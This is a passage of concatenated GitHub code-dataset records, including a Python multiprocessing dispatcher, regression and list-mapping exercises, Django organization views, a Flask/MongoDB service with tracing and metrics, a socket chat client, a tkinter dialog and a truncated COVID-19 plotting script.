queue.\n        \"\"\"\n        self.resultQueue.put(output)\n    \n    def getResult(self):\n        \"\"\"\n        Get a result from the result queue.\n        \"\"\"\n        return self.resultQueue.get()\n    \nclass MultiCoreProxy:\n    \"\"\"\n    The MultiCoreProxy class provides a target worker class method for queued processes.\n    \"\"\"\n    def __init__(self, numprocesses=1, tasks=[ ]):\n        \"\"\"\n        Initialise the MultiCoreProxy and create the dispatcher and processes.\n        \"\"\"\n        self.numprocesses = numprocesses\n        self.Tasks = tasks\n        self.numtasks = len(tasks)\n    \n        # Create the dispatcher\n        self.dispatcher = ObjectDispatcher()\n    \n        self.Processes = [ ]\n    \n        # The worker processes must be started here!\n        for n in range(numprocesses):\n            process = Process(target=MultiCoreProxy.worker, args=(self.dispatcher,))\n            process.start()\n            self.Processes.append(process)\n    \n        self.timeStart = 0.0\n        self.timeElapsed = 0.0\n        self.timeRemain = 0.0\n        self.processTime = { }\n    \n        # Set some program flags\n        self.keepgoing = True\n        self.i = 0\n        self.j = 0\n    \n    def run(self):\n        \"\"\"\n        Run the MultiCoreProxy - start, stop & terminate processes.\n        \"\"\"\n        if (self.numprocesses == 0):\n            sys.stdout.write(' (no extra processes)')\n        sys.stdout.write('\\nUnordered results...\\n')\n        self.processTasks(self.update)\n        if (self.keepgoing):\n            sys.stdout.write('Time elapsed: %s\\n' % time.strftime('%M:%S', time.gmtime(self.timeElapsed)))\n        if (self.numprocesses > 0):\n            sys.stdout.write(\"Waiting for processes to terminate...\")\n            self.processTerm()\n    \n    def processTasks(self, resfunc=None):\n        \"\"\"\n        Start the execution of tasks by the processes.\n        \"\"\"\n        self.keepgoing = True\n    \n        self.timeStart = time.time()\n        # Set the initial process time for each\n        for n in range(self.numprocesses):\n            pid_str = '%d' % self.Processes[n].pid\n            self.processTime[pid_str] = 0.0\n    \n        # Submit first set of tasks\n        if (self.numprocesses == 0):\n            numprocstart = 1\n        else:\n            numprocstart = min(self.numprocesses, self.numtasks)\n        for self.i in range(numprocstart):\n            self.dispatcher.putTask(self.Tasks[self.i])\n    \n        self.j = -1\n        self.i = numprocstart - 1\n        while (self.j < self.i):\n            # Get and print results
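\n            # getOutput() blocks on the result queue until one worker posts a finished task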
\n            output = self.getOutput()\n            # Execute some function (Yield to a wx.Button event)\n            if (isinstance(resfunc, (types.FunctionType, types.MethodType))):\n                resfunc(output)\n            if ((self.keepgoing) and (self.i + 1 < self.numtasks)):\n                # Submit another task\n                self.i += 1\n                self.dispatcher.putTask(self.Tasks[self.i])\n    \n    def processStop(self, resfunc=None):\n        \"\"\"\n        Stop the execution of tasks by the processes.\n        \"\"\"\n        self.keepgoing = False\n    \n        while (self.j < self.i):\n            # Get and print any results remaining in the done queue\n            output = self.getOutput()\n            if (isinstance(resfunc, (types.FunctionType, types.MethodType))):\n                resfunc(output)\n    \n    def processTerm(self):\n        \"\"\"\n        Stop the execution of tasks by the processes.\n        \"\"\"\n        for n in range(self.numprocesses):\n            # Terminate any running processes\n            self.Processes[n].terminate()\n    \n        # Wait for all processes to stop\n        while (self.anyAlive()):\n            time.sleep(0.5)\n    \n    def anyAlive(self):\n        \"\"\"\n        Check if any processes are alive.\n        \"\"\"\n        isalive = False\n        for n in range(self.numprocesses):\n            isalive = (isalive or self.Processes[n].is_alive())\n        return isalive\n    \n    def getOutput(self):\n        \"\"\"\n        Get the output from one completed task.\n        \"\"\"\n        self.j += 1\n    \n        if (self.numprocesses == 0):\n            # Use the single-process method\n            self.worker_sp()\n    \n        output = self.dispatcher.getResult()\n        # Calculate the time remaining\n        self.timeRemaining(self.j + 1, self.numtasks, output['process']['pid'])\n    \n        return(output)\n    \n    def timeRemaining(self, tasknum, numtasks, pid):\n        \"\"\"\n        Calculate the time remaining for the processes to complete N tasks.\n        \"\"\"\n        timeNow = time.time()\n        self.timeElapsed = timeNow - self.timeStart\n    \n        pid_str = '%d' % pid\n        self.processTime[pid_str] = self.timeElapsed\n    \n        # Calculate the average time elapsed for all of the processes\n        timeElapsedAvg = 0.0\n        numprocesses = self.numprocesses\n        if (numprocesses == 0): numprocesses = 1\n        for pid_str in self.processTime.keys():\n            timeElapsedAvg += self.processTime[pid_str]/numprocesses\n        self.timeRemain = timeElapsedAvg*(float(numtasks)/float(tasknum) - 1.0)\n    \n    def update(self, output):\n        \"\"\"\n        Get and print the results from one completed task.\n        \"\"\"\n        pass\n    \n    def worker(cls, dispatcher):\n        \"\"\"\n        The worker creates a TaskProcessor object to calculate the result.\n        \"\"\"\n        while True:\n            args = dispatcher.getTask()\n            taskproc = TaskProcessor(args[0])\n            result = taskproc.calculate(args[1])\n            # Wrap the result with the worker pid, since getOutput()/timeRemaining() read output['process']['pid']\n            output = { 'process' : { 'pid' : current_process().pid }, 'result' : result }\n            # Put the result on the output queue\n            dispatcher.putResult(output)\n    \n    # The multiprocessing worker must not require any existing object for execution!\n    worker = classmethod(worker)\n    \n    def worker_sp(self):\n        \"\"\"\n        A single-process version of the worker method.\n        \"\"\"\n        args = self.dispatcher.getTask()\n        taskproc = TaskProcessor(args[0])\n        result = taskproc.calculate(args[1])\n        # Wrap the result with the current pid so getOutput() can read output['process']['pid']\n        output = { 'process' : { 'pid' : os.getpid() }, 'result' : result }\n        # Put the result on the output queue\n        self.dispatcher.putResult(output)\n","repo_name":"GeoDaCenter/CAST","sub_path":"stars/core/MultiCores.py","file_name":"MultiCores.py","file_ext":"py","file_size_in_byte":7266,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"28679281978","text":"from statistics import mean\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport random\n\nstyle.available\nstyle.use('Solarize_Light2')\n# xs= np.array([1,2,3,4,5,6], dtype = np.float64)\n# ys= np.array([5,4,6,5,6,7], dtype= np.float64)\n\n#Defining best fit slope and intercept\n\ndef 
best_fit_slope_and_intercept(xs,ys):\n \n m= (((mean(xs)*mean(ys))- mean(xs*ys)) / \n ((mean(xs)**2) - mean(xs**2)))\n b= mean(ys)- m* mean(xs)\n return m, b\n\n#calculating squared error function\ndef squared_error(ys_line, ys_orig):\n return sum((ys_line-ys_orig)**2)\n\ndef coefficient_of_determination (ys_line, ys_orig):\n squared_error_regr= squared_error(ys_line, ys_orig)\n y_mean_list = [mean(ys_orig) for _ in ys_orig]\n squared_error_orig = squared_error(ys_orig, y_mean_list)\n return 1 - (squared_error_regr/squared_error_orig)\n\n#Creatong random datasets\n\ndef create_dataset(how_many, variance,step, correlation = False):\n val= 1\n ys= []\n for i in range(how_many):\n ys.append(val+ random.randrange(-variance, +variance))\n \n if correlation=='pos' and correlation :\n val += step\n elif correlation and correlation == 'neg' :\n val -=step\n xs=[i for i in range(len(ys))]\n \n return np.array(xs, dtype= np.float64), np.array(ys, dtype= np.float64)\n\n\nxs,ys = create_dataset(40, 3, 3, correlation = 'pos')\n\n\nm, b= best_fit_slope_and_intercept(xs, ys)\npredict_X= 8\npredictt_Y = (m * predict_X) + b \nregression_line = [m*x +b for x in xs]\n\nprint(m,b)\n\nr_squared = coefficient_of_determination(regression_line, ys)\nprint(r_squared)\n\nplt.scatter(xs,ys,c = 'red')\nplt.plot(xs,regression_line)\nplt.scatter(predict_X,predictt_Y, s=100,color='red')\nplt.show()\n\n\n","repo_name":"anilyavuz/my-ML-projects","sub_path":"Regression model- best fit/best fit.py","file_name":"best fit.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26616304922","text":"import sqlite3\nimport sys\nimport os\nfrom tabulate import tabulate\n\nsys.path.append('..')\ndb_filename = '../task_18_1/dhcp_snooping.db'\n\n\nargvs = sys.argv[1:]\nargvs_to_db = []\n\ncolumns_list = ['mac', 'ip', 'vlan', 'interface', 'switch']\n\n\ndef get_data(argvs=None):\n db_exists = os.path.exists(db_filename)\n\n if db_exists:\n if argvs != None:\n conn = sqlite3.connect(db_filename)\n result = conn.execute(f'select * from dhcp where {argvs[0]} = \"{argvs[1]}\"')\n display = [row for row in result]\n print(tabulate(display, headers=columns_list))\n\n else:\n conn = sqlite3.connect(db_filename)\n result = conn.execute('select * from dhcp')\n display = [row for row in result]\n print(tabulate(display, headers=columns_list))\n\n else:\n print('Database does not exist')\n\n\nif len(argvs) > 0:\n if len(argvs) != 2:\n print('This script only takes two or none arguments\\n'\n 'in format: \\n'\n 'Columns are: mac, ip, vlan, interface, switch.'\n )\n else:\n if argvs[0] in columns_list:\n argvs_to_db = [argv for argv in argvs]\n get_data(argvs_to_db)\n\n else:\n print('This script only takes two or none arguments\\n'\n 'in format: \\n'\n 'Columns are: mac, ip, vlan, interface, switch.'\n )\n\nelse:\n get_data()","repo_name":"fortredux/py_net_eng","sub_path":"exercises/18_db/task_18_2/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34309121198","text":"from datetime import datetime, timedelta\nfrom django.http import HttpRequest, HttpResponse\nfrom django.utils import simplejson as json\nfrom django.contrib.auth import authenticate, logout\nfrom django.db.models import Q\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom website.utils.httpUtil import 
HttpRequestProcessor\nfrom website.utils.sessionHelper import SessionHelper\nfrom website.models import Organization, OrganizationMember, RatingCategory, OrganizationRating, Jurisdiction, JurisdictionContributor\nfrom django.contrib.sites.models import Site\nfrom django.contrib.sites.models import get_current_site\n\nfrom django.conf import settings as django_settings\n\ndef get_organization(request):\n requestProcessor = HttpRequestProcessor(request)\n \n output = {}\n output['organizations'] = []\n \n text = requestProcessor.getParameter('text')\n if text == None: \n return HttpResponse(json.dumps(output))\n \n #only if text is at least 2 chars\n if len(text) > 1:\n orgs = Organization.objects.filter(Q(name__icontains=text)).order_by('name')[0:20]\n for org in orgs:\n org_item = {}\n org_item['id'] = org.id\n org_item['name'] = org.name\n output['organizations'].append(org_item)\n \n return HttpResponse(json.dumps(output))\n \ndef set_member(request):\n requestProcessor = HttpRequestProcessor(request)\n \n output = {}\n output['e'] = False\n output['m'] = ''\n \n org_id = requestProcessor.getParameter('org_id')\n if org_id == None: \n output['e'] = True\n output['m'] = 'No org_id provided'\n return HttpResponse(json.dumps(output))\n \n username = requestProcessor.getParameter('username')\n if username == None: \n output['e'] = True\n output['m'] = 'No username provided'\n return HttpResponse(json.dumps(output))\n \n try:\n organization = Organization.objects.get(id=org_id)\n except:\n output['e'] = True\n output['m'] = 'Organization not found.'\n return HttpResponse(json.dumps(output))\n \n try:\n user = User.objects.get(username=username)\n except:\n output['e'] = True\n output['m'] = 'User not found.'\n return HttpResponse(json.dumps(output))\n \n organization.set_member(user)\n \n return HttpResponse(json.dumps(output))\n\ndef delete_organization(request):\n requestProcessor = HttpRequestProcessor(request)\n user = request.user\n \n output = {}\n output['e'] = False\n output['m'] = ''\n \n org_id = requestProcessor.getParameter('org_id')\n if org_id == None: \n output['e'] = True\n output['m'] = 'No org_id provided.'\n return HttpResponse(json.dumps(output))\n \n try:\n organization = Organization.objects.get(id=org_id)\n except:\n output['e'] = True\n output['m'] = 'Organization does not exist.'\n return HttpResponse(json.dumps(output))\n \n try:\n owner = OrganizationMember.objects.get(organization=organization, role__name='Owner', status='A')\n except:\n owner = None\n \n #is user the owner or admin?\n if user.is_staff != True:\n if owner != None:\n if user != owner.user:\n output['e'] = True\n output['m'] = 'You do not have the access right to delete this organization.'\n return HttpResponse(json.dumps(output))\n \n #does org has other members besides owner\n members = OrganizationMember.objects.filter(organization=organization, status='A').exclude(user=owner.user)\n if len(members) > 0:\n output['e'] = True\n output['m'] = 'You cannot delete an organization that has other active members.'\n return HttpResponse(json.dumps(output))\n \n organization.delete()\n output['m'] = 'Organization deleted.'\n return HttpResponse(json.dumps(output))\n\ndef top_org_contributors(request):\n requestProcessor = HttpRequestProcessor(request)\n\n number = requestProcessor.getParameter('number')\n if number == None:\n number = 3\n \n jid = requestProcessor.getParameter('jid')\n if jid != None:\n jurisdiction = Jurisdiction.objects.get(id=jid) \n\n current_site = get_current_site(request)\n\n 
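# base URL prefix for organization logos: current site name + MEDIA_URL\n    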
logo_src = str(current_site.name) + str(django_settings.MEDIA_URL) \n\n    top_org_contributors = [] \n    rating_category = RatingCategory.objects.get(id=1)\n\n    \n    if jid == None:\n        top_org_contributors_qryset = OrganizationRating.objects.filter(category__exact=rating_category).order_by('-scale')[:number]\n    else:\n        top_org_contributors_qryset = JurisdictionContributor.objects.filter(jurisdiction__exact=jurisdiction, question_category__isnull=True, user__isnull=True).order_by('-points')[:number]\n\n\n    if top_org_contributors_qryset:\n        for org in top_org_contributors_qryset:\n            top_org_contributor = {}\n            top_org_contributor['id'] = org.organization_id\n            org = Organization.objects.get(id=org.organization_id)\n            top_org_contributor['name'] = org.name\n            top_org_contributor['logo_src'] = str(logo_src) + str(org.logo)\n            top_org_contributors.append(top_org_contributor)\n\n    return HttpResponse(json.dumps(top_org_contributors))\n    \n    ","repo_name":"solarpermit/solarpermit","sub_path":"website/services/organization_services.py","file_name":"organization_services.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"1451314490","text":"from flask import Flask, render_template, request, jsonify\n\nfrom prometheus_client import make_wsgi_app\nfrom werkzeug.middleware.dispatcher import DispatcherMiddleware\nfrom werkzeug.serving import run_simple\nfrom flask_prometheus_metrics import register_metrics\n\nimport pymongo\nimport logging\nfrom flask_pymongo import PyMongo\n\nfrom jaeger_client import Config\nfrom flask_opentracing import FlaskTracing\n\napp = Flask(__name__)\n\napp.config[\"MONGO_DBNAME\"] = \"example-mongodb\"\napp.config[\n    \"MONGO_URI\"\n] = \"mongodb://example-mongodb-svc.default.svc.cluster.local:27017/example-mongodb\"\n\nmongo = PyMongo(app)\n\ndef init_tracer(service):\n    logging.getLogger(\"\").handlers = []\n    logging.basicConfig(format=\"%(message)s\", level=logging.DEBUG)\n\n    config = Config(\n        config={\"sampler\": {\"type\": \"const\", \"param\": 1,}, \"logging\": True, 'reporter_batch_size': 1,},\n        service_name=service,\n    )\n\n    # this call also sets opentracing.tracer\n    return config.initialize_tracer()\n\njaeger_tracer = init_tracer(\"backend\")\n\ntracing = FlaskTracing(jaeger_tracer)\n\n# provide app's version and deploy environment/config name to set a gauge metric\nregister_metrics(app, app_version=\"v0.1.2\", app_config=\"staging\")\n\n# Plug metrics WSGI app to your main app with dispatcher\ndispatcher = DispatcherMiddleware(app.wsgi_app, {\"/metrics\": make_wsgi_app()})\n\n@app.route(\"/\")\ndef homepage():\n    with jaeger_tracer.start_active_span('homepage') as scope:\n        return \"Hello World\"\n\n\n@app.route(\"/api\")\ndef my_api():\n    with jaeger_tracer.start_active_span('my_api') as scope:\n        answer = \"something\"\n        return jsonify(response=answer)\n\n\n@app.route(\"/star\", methods=[\"POST\"])\ndef add_star():\n    with jaeger_tracer.start_active_span('add_star') as scope:\n        star = mongo.db.stars\n        scope.span.log_kv({'event': 'starting mongodb', 'value': star })\n\n        name = request.json[\"name\"]\n        scope.span.log_kv({'event': 'getting name from request', 'value': name })\n\n        distance = request.json[\"distance\"]\n        scope.span.log_kv({'event': 'getting distance from request', 'value': distance })\n\n        star_id = star.insert({\"name\": name, \"distance\": distance})\n        scope.span.log_kv({'event': 'insert into mongodb', 'value': star_id })\n\n        new_star = star.find_one({\"_id\": star_id})\n        
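        # Editor's note (annotation, not part of the original source): the stored
        # document is read back so the response, and the span log that follows,
        # reflect exactly what MongoDB persisted.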
scope.span.log_kv({'event': 'find inserted value', 'value': new_star })\n\n        output = {\"name\": new_star[\"name\"], \"distance\": new_star[\"distance\"]}\n        scope.span.log_kv({'event': 'output value', 'value': output })\n        \n        return jsonify({\"result\": output})\n\nrun_simple(hostname=\"0.0.0.0\", port=8080, application=dispatcher)\n\n# if __name__ == \"__main__\":\n#     # app.run()\n    \n","repo_name":"azzahamdani/udacity-building-metrics-dashbord","sub_path":"reference-app/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41471299906","text":"\n# Transforming a 'list' with map\n\n# We create a list of dicts for this exercise.\n\nitems = [\n    {\n        'product': 'camisa',\n        'price': 100\n    },\n    {\n        'product': 'pantalones',\n        'price': 400\n    },\n    {\n        'product': 'sombrero',\n        'price': 600\n    }\n]\n\n# We are going to transform this list into a list of numbers.\n\n# It should show only the price numbers in a list.\n\nprices = list(map(lambda item: item['price'], items))\n\nprint(prices)\n\n# Now let's add a new attribute 'taxes' to this list or 'array'\n\n# copy() => to copy the array so the original does not have to be modified.\n\ndef add_taxes(item):\n    new_item = item.copy()\n    new_item['taxes'] = new_item['price'] * .19\n    return new_item\n\nnew_items = list(map(add_taxes, items))\n\nprint(new_items)\nprint('Old items')\nprint(items)\n\n\n\n# exercise\n'''\ngroup_music = [\n    {\n        'Grupo musical': 'blackpink',\n        'cancion': 'savage',\n        'pais': 'japon'\n    },\n    {\n        'Grupo musical': 'taylor swift',\n        'cancion': 'red',\n        'pais': 'USA'\n    },\n    {\n        'Grupo musical': 'Linkin Park',\n        'cancion': 'crying',\n        'pais': 'Britanico'\n    }\n]\n\ndef add_info(new_info):\n    new_info['genero'] = 'rock'\n    return new_info\n\nadd_new_info = list(map(add_info, group_music))\nprint(add_new_info)\n'''","repo_name":"Marlon4789/Python-comprehencions","sub_path":"14_map_dict.py","file_name":"14_map_dict.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25184388250","text":"import tkinter as tk\nfrom Source.View.Components.backButton import *\n\n\ndef interface_exported_to_excel(export_to_excel):\n    # Interface for displaying completion of export to Excel\n    export_to_excel()\n\n    exUI = tk.Toplevel()\n    exUI.title(\"Export Complete\")\n    exUI.geometry(\"800x600\")\n    exUI.config(padx=10, pady=100)\n    exUI.resizable(width=False, height=False)\n\n    header_label = tk.Label(exUI, text=\"Excel File Export Complete\", font=(\"Calibri\", 18, \"italic\"))\n    header_label.pack(pady=10)\n\n    back_button(exUI, exUI.destroy)\n","repo_name":"jotadevss/GFinance","sub_path":"Source/View/exported.py","file_name":"exported.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32718029148","text":"\"\"\" Link Travel Time Models for VehicleTracker \"\"\"\nimport logging\nfrom datetime import datetime\nfrom typing import Any, Dict\nimport json\n\nimport numpy as np\nimport pandas as pd\n\nfrom vehicletracker.helpers.spatial_reference import SpatialRef\nfrom vehicletracker.models.travel_time import TravelTimeModel\n\n_LOGGER = logging.getLogger(__name__)\n\nclass WeeklyHistoricalAverageTravelTime(TravelTimeModel):\n\n    def train(self, time : datetime, spatial_ref : SpatialRef, parameters : Dict[str, 
Any]) -> Dict[str, Any]:\n n_days = parameters.get('nDays', 21)\n data, data_labels = self.travel_time_n_preceding_normal_days(time, n_days, spatial_ref)\n\n df = pd.DataFrame(data)\n df['time'] = pd.to_datetime(df['time'], unit='s')\n\n self.link_refs = np.array(data_labels['linkRef'])\n self.link_ix_lookup = { key: value for value, key in enumerate(self.link_refs) }\n self.travel_time_lookup = []\n \n for link_ix, link_ref in enumerate(self.link_refs):\n ix_hour = np.arange(24)\n ix_weekday = np.arange(7)\n df_link = df[df['linkRef'] == link_ix].drop('linkRef', axis=1)\n df_link['hour'] = df_link['time'].dt.hour\n df_link['weekday'] = df_link['time'].dt.weekday\n matrix = df_link.groupby(['hour', 'weekday'])['travelTime'].mean().unstack(1).reindex(ix_hour, axis=0).reindex(ix_weekday, axis=1)\n matrix = matrix.fillna(method='ffill').fillna(method='bfill').fillna(df_link['travelTime'].mean())\n self.travel_time_lookup.append(matrix)\n\n pred = self.predict({\n 'time': df['time'].astype(str).tolist(),\n 'linkRef': self.link_refs[df['linkRef']].tolist()\n })\n\n return {\n 'loss': np.mean((df['travelTime'] - pred)**2),\n 'spatialRefs': data_labels['linkRef']\n }\n\n def save(self, model_store, metadata):\n config = []\n for link_ix, link_ref in enumerate(self.link_refs):\n config.append({\n 'linkRef': link_ref,\n 'lookup': self.travel_time_lookup[link_ix].values.tolist()\n })\n\n with open(metadata['resourceUrl'] + '/config.json', 'w') as config_file:\n json.dump(config, config_file)\n \n def restore(self, model_store, metadata):\n _LOGGER.info(\"Restoring model '%s'...\", metadata['ref'])\n\n with open(metadata['resourceUrl'] + '/config.json', 'r') as config_file:\n config = json.load(config_file)\n\n self.link_refs = []\n self.travel_time_lookup = []\n\n for link in config:\n ix_hour = np.arange(24)\n ix_weekday = np.arange(7)\n self.link_refs.append(link['linkRef'])\n self.travel_time_lookup.append(pd.DataFrame(data=link['lookup'], index=ix_hour, columns=ix_weekday))\n\n self.link_ix_lookup = { key: value for value, key in enumerate(self.link_refs) }\n\n def predict(self, predict_params):\n # Single prediction\n if 'time' in predict_params and isinstance(predict_params['time'], str):\n time = pd.to_datetime([predict_params['time']])\n link_ix = self.link_ix_lookup[predict_params['linkRef']]\n return self.travel_time_lookup[link_ix].lookup(time.hour, time.weekday)\n # Batch prediction\n elif 'time' in predict_params and isinstance(predict_params['time'], list):\n time = pd.to_datetime(predict_params['time'])\n link_ix = np.array([self.link_ix_lookup[x] for x in predict_params['linkRef']])\n pred = np.empty_like(time, dtype=float) \n for link_ix_, link_ref_ in enumerate(self.link_refs):\n mask = link_ix_ == link_ix\n pred[mask] = self.travel_time_lookup[link_ix_].lookup(time[mask].hour, time[mask].weekday)\n return pred\n else:\n raise ValueError('Unsupported predict parameters: %s', predict_params)\n","repo_name":"niklascp/vehicletracker","sub_path":"vehicletracker/models/WeeklyHistoricalAverageTravelTime.py","file_name":"WeeklyHistoricalAverageTravelTime.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8005093473","text":"import sys\n\nN, M = map(int, input().split())\naij = list(map(list, sys.stdin.read().split()))\naij.reverse()\nwon = [(0, 2*N-i-1) for i in range(N * 2)]\n\nfor j in range(M):\n for k in range(N):\n p1 = k*2\n p2 = k*2+1\n w1, i1 = won[p1]\n w2, i2 = won[p2]\n if 
aij[i1][j] == aij[i2][j]:\n            continue\n        if aij[i1][j] == 'G' and aij[i2][j] == 'C':\n            won[p1] = (w1+1, i1)\n        elif aij[i1][j] == 'G' and aij[i2][j] == 'P':\n            won[p2] = (w2+1, i2)\n        elif aij[i1][j] == 'C' and aij[i2][j] == 'P':\n            won[p1] = (w1+1, i1)\n        elif aij[i1][j] == 'C' and aij[i2][j] == 'G':\n            won[p2] = (w2+1, i2)\n        elif aij[i1][j] == 'P' and aij[i2][j] == 'G':\n            won[p1] = (w1+1, i1)\n        elif aij[i1][j] == 'P' and aij[i2][j] == 'C':\n            won[p2] = (w2+1, i2)\n\n    won = sorted(won, reverse=True)\n\nfor _, i in sorted(won, reverse=True):\n    print(N*2-i)","repo_name":"makiton/atcoder","sub_path":"abc222/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25689820508","text":"import json\nimport socket\nfrom PyQt5.QtCore import QThread\n\n\nclass connecter(QThread):\n    'Connector'\n    def __init__(self, BUFSIZ, ADDRESS):\n        super(connecter, self).__init__()\n        self.BUFSIZ = BUFSIZ  # buffer size for data transfers\n        self.ADDRESS = ADDRESS  # address to connect to\n        self.command = []  # commands issued by the user\n        self.signal = {}  # assorted signals, supplied by the window\n        self.topics = []  # topics the user follows\n        self.tcpClientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # the actual socket connection\n\n    def setSignal(self, name, signal):\n        'Set a signal'\n        self.signal[name] = signal\n\n    def send(self, msg):\n        'Send a message'\n        if msg:\n            try:\n                self.command.append(msg.split(' ')[0])  # split off the command being sent and append it to the command list\n                self.tcpClientSocket.send(msg.encode('utf-8'))\n            except Exception as e:\n                print(e)\n\n    def login(self, account: dict):\n        'Log in'\n        self.send('/login {} {}'.format(account['username'], account['password']))\n\n    def run(self):\n        'Receive data from the server'\n        self.tcpClientSocket.connect(self.ADDRESS)  # connect\n        try:\n            while True:\n                # loop forever, receiving continuously\n                data = self.tcpClientSocket.recv(self.BUFSIZ).decode('utf-8')\n                if data == '/close':\n                    break\n                else:\n                    # parse the data and pop the matching command\n                    self.analysis(self.command.pop(0), data)\n        except Exception as e:\n            # only print errors that are not from an intentional disconnect\n            if '你的主机中的软件中止了一个已建立的连接' not in str(e):\n                print(e)\n            self.tcpClientSocket.close()\n\n    def analysis(self, cmd, data):\n        'Parse data'\n        if cmd == '/login':\n            try:\n                data = json.loads(data)\n                self.topics = data  # save the topics we received\n                if 'default' in self.signal:\n                    self.signal['default'].emit('登录成功')\n                else:\n                    self.signal['/login'].emit(True)\n            except Exception:\n                # if JSON parsing fails, send a False signal to the login window\n                if 'default' in self.signal:\n                    self.signal['default'].emit('账户或密码错误')\n                else:\n                    self.signal['/login'].emit(False)\n        else:\n            try:\n                jsdata = json.loads(data)\n                # forward the parsed JSON data to the window\n                if cmd in self.signal:\n                    self.signal[cmd].emit(jsdata)\n                elif 'default' in self.signal:\n                    self.signal['default'].emit(data)\n            except Exception as e:\n                if data == '请先登录':\n                    if 'default' in self.signal:\n                        self.signal['default'].emit(data)\n                    else:\n                        self.signal['/login'].emit(False)\n                print(e, data)\n\n    def quit(self):\n        'Disconnect'\n        self.send('/close')\n        self.tcpClientSocket.close()\n        super().quit()\n","repo_name":"Drelf2018/Liter","sub_path":"Liter_Client/send_receive.py","file_name":"send_receive.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23704901702","text":"list = []\nwhile True:\n    n = int(input('Enter a value: '))\n    if n not in list:\n        list.append(n)\n        print('Number added successfully...')\n    else:\n        print('Duplicate value, enter it again...')\n    r = str(input('Do you want to continue? [Y/N] '))\n    if r in 'Nn':\n        break\nprint('-=' * 30)\nlist.sort()\nprint(f'Your list was {list}')\n","repo_name":"annakesyalima/python","sub_path":"programas/mundo-3/Teste79.py","file_name":"Teste79.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41903999861","text":"import threading\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authentication import SessionAuthentication\nfrom rest_framework.filters import SearchFilter\nfrom pesticide_app.api.serializers import CommentSerializer\nfrom pesticide_app.permissions import CommentorPermissions, AdminOrReadOnlyPermisions\nfrom pesticide_app.models import Comment\nfrom pesticide_app.mailing import new_comment\nfrom slugify import slugify\nfrom pesticide.settings import FRONTEND_URL\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n    serializer_class = CommentSerializer\n    queryset = Comment.objects.all()\n    permission_classes = [IsAuthenticated & (\n        CommentorPermissions | AdminOrReadOnlyPermisions)]\n    filter_backends = (SearchFilter, )\n    authentication_classes = [SessionAuthentication, ]\n    search_fields = ['text']\n\n    def create(self, request, *args, **kwargs):\n        comment = request.data\n        comment['commentor'] = request.user.id\n        serializer = CommentSerializer(data=comment)\n        if serializer.is_valid():\n            self.perform_create(serializer)\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        else:\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def perform_create(self, serializer):\n        comment = serializer.save()\n        projectPageLink = f\"{FRONTEND_URL}/projects/{slugify(comment.issue.project.name)}/issues/{comment.issue.id}\"\n        email_notification = threading.Thread(\n            target=new_comment,\n            args=(\n                comment.issue.project.name,\n                projectPageLink,\n                comment.issue,\n                comment.issue.reporter.name,\n                comment.text,\n                comment.commentor.name,\n                comment.issue.reporter,\n                comment.issue.assigned_to,\n                comment.issue.project.members.all(),\n            )\n        )\n        email_notification.start()\n","repo_name":"MihirSachdeva/pesticide-docker","sub_path":"pesticide_backend/src/pesticide_app/views/comment/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"41327898785","text":"'''\n\nCreated on 4 May 2020\n@author: ethancollopy\n\n'''\n\nimport pandas as pd \nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\npd.set_option('display.max_rows', None)\npd.set_option('display.max_columns', None)\npd.set_option('display.width', None)\npd.set_option('display.max_colwidth', None)\n\nplt.rcParams.update({'font.serif': 'Times New Roman',\n                     'font.size': 10.0,\n                     'axes.labelsize': 'Medium',\n                     'axes.labelweight': 'normal',\n                     'axes.linewidth': 0.8,\n                     # THIS IS THE IMPORTANT ONE FOR STRETCHING\n                     # default is [6,4] but...i changed it to\n                     'figure.figsize':[16,8] # THIS ONE #\n                    })\n\n \n#print(data2)\nCountries=['Spain','United Kingdom']\n\n\ncasesData = pd.read_csv(\"/Users/ethancollopy/dev/git/data/COVID19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv\" , index_col='Country/Region') \ncasesData22 = casesData[casesData['Province/State'].isnull()] \ncasesData2 = casesData22.transpose()\ncasesData3 = 
